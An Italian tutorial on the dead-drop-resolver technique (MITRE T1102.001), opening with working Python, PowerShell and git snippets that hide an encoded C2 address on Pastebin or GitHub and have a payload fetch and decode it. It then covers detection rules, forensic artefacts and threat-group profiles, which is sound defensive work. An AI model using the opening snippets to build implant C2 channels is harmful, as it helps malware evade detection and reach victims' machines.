Dead Drop Resolver: Nascondino Digitale nel Web Service (T1102.001)

Iniziamo con un setup classico utilizzando Pastebin come resolver. Crea prima il contenuto codificato che conterrà l'IP del tuo C2:

echo -n "192.168.1.100:8443" | base64
# Output: MTkyLjE2OC4xLjEwMDo4NDQz

Pubblica questa stringa su Pastebin e ottieni l'URL raw (esempio: pastebin.com/raw/abc123). Nel tuo payload Python, implementa il resolver:

import requests
import base64

resolver_url = "https://pastebin.com/raw/abc123"
encoded_c2 = requests.get(resolver_url).text.strip()
c2_address = base64.b64decode(encoded_c2).decode()

Per aumentare la resilienza, implementa una rotazione multi-piattaforma. Configura resolver su GitHub creando un repository con un file README.md contenente marker specifici:

echo "<!-- START -->aHR0cHM6Ly9jMi5leGFtcGxlLmNvbTo0NDM=<!-- END -->" > README.md
git add README.md && git commit -m "Update documentation"
git push origin main

Il parsing diventa:

import re
github_content = requests.get("https://raw.githubusercontent.com/user/repo/main/README.md").text
c2_encoded = re.search(r'<!-- START -->(.+?)<!-- END -->', github_content).group(1)

Twitter/X richiede l'uso delle API o scraping. Per YouTube, nascondi i dati nei commenti o nelle descrizioni video utilizzando steganografia testuale. APT41 ha dimostrato l'efficacia di questa tecnica aggiornando frequentemente i post su forum tecnici durante la campagna C0017.

Per Windows, PowerShell offre flessibilità nell'implementazione:

$resolver = (Invoke-WebRequest -Uri "https://pastebin.com/raw/abc123").Content
$c2 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($resolver))

La detection efficace richiede correlazione tra accesso a servizi web comuni e successive connessioni anomale. Monitora gli eventi Sysmon per Windows, concentrandoti su EventID 3 (connessioni di rete).

Crea una regola che identifichi:

detection:
  condition: selection_web_service AND selection_followup within 5m
  selection_web_service:
    DestinationHostname|contains:
      - 'pastebin.com'
      - 'github.com'
      - 'youtube.com'
  selection_followup:
    DestinationPort: 
      - 443
      - 8443
      - 4443

L'entropia del payload è un indicatore chiave. Contenuti con alta entropia dopo accesso a servizi popolari suggeriscono dati codificati. Implementa analisi statistica sui payload HTTP/HTTPS catturati.

Per Linux, auditd fornisce visibilità sulle syscall di rete. Monitora connect() e sendto() verso domini sospetti:

auditctl -a always,exit -F arch=b64 -S connect -k dead_drop_network

La timeline è critica: il gap temporale tra accesso al resolver e connessione C2 varia da secondi a minuti. RTM utilizzava feed RSS su Livejournal con aggiornamenti ogni 30 minuti, mentre KEYPLUG controllava forum tecnici ogni 2-3 ore.

Implementa whitelist basate sul contesto utente. Un developer che accede a GitHub è normale, ma lo stesso comportamento da un account di servizio è anomalo. I falsi positivi diminuiscono drasticamente con filtering per UserContext appropriato.

Gli artefatti del dead drop resolver si manifestano in molteplici location. Su Windows, esamina prima il WebCache:

Get-ChildItem "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" | Select-String -Pattern "pastebin|github"

La memoria del browser contiene spesso i dati decodificati. Usa Volatility per estrarre stringhe dalla memoria di processo:

volatility -f memory.dmp --profile=Win10x64 strings -p <browser_pid> | grep -E "(base64|https?://)"

Astaroth lasciava tracce distintive memorizzando configurazioni C2 su AWS e CloudFlare. Cerca pattern di accesso a bucket S3 pubblici seguiti da connessioni verso IP non categorizzati.

Il Prefetch di Windows registra l'esecuzione di tool che accedono a resolver:

C:\Windows\Prefetch\POWERSHELL.EXE-*.pf
C:\Windows\Prefetch\CHROME.EXE-*.pf

Su Linux, analizza i log di sistema per correlazioni temporali:

journalctl --since="2024-01-01" | grep -E "(curl|wget|python.*requests)" | grep -A5 -B5 "(pastebin|github)"

La ricostruzione richiede attenzione ai dettagli. Durante la campagna 3CX Supply Chain Attack, AppleJeus utilizzava repository GitHub per hostare file icona contenenti URL C2. L'analisi forense rivelò modifiche ai commit ogni 12-24 ore per mantenere l'infrastruttura dinamica.

Per ESXi, i log vobd mostrano connessioni anomale verso servizi web da processi di sistema. La correlazione con firewall log evidenzia pattern di traffico post-resolver verso destinazioni non RFC1918.

APT41 domina il panorama del dead drop resolver con sofisticazione operativa unica. Durante C0017, hanno dimostrato agilità estrema aggiornando costantemente post su forum tecnici, adattandosi alle remediation in tempo reale.

Patchwork (G0040) preferisce un approccio più statico, nascondendo server C2 base64-encoded nei commenti di siti legittimi. La loro firma è l'uso di siti regionali specifici per il Sud Asia, riflettendo il targeting geografico del gruppo.

BRONZE BUTLER integra MSGET downloader con resolver multipli, dimostrando ridondanza operativa. Il gruppo mantiene tipicamente 3-5 resolver attivi simultaneamente su piattaforme diverse.

Kimsuky ha evoluto l'uso di TRANSLATEXT per recuperare configurazioni da blog pubblici. L'innovazione sta nell'uso di post scheduling per attivare payload in momenti specifici, sincronizzati con operazioni fisiche.

Il tool overlap rivela convergenze interessanti. PlugX, utilizzato da multipli APT cinesi, standardizza su Pastebin per semplicità. Metamorfo e Javali, entrambi dal panorama latinoamericano del crimine finanziario, convergono su YouTube e Google Docs per targeting bancario.

Le campagne documentate mostrano evoluzione tattica. Da tecniche base di encoding a steganografia avanzata in contenuti multimediali. La prossima evoluzione probabilmente sfrutterà piattaforme decentralizzate e blockchain per maggiore resilienza.

Framework MITRE ATT&CK T1102.001. Campagne documentate: C0017 (APT41, 2021-2022), 3CX Supply Chain Attack (UNC4736/AppleJeus, 2022-2023). Detection strategies: DET0058 con analytics platform-specific (AN0158-AN0161).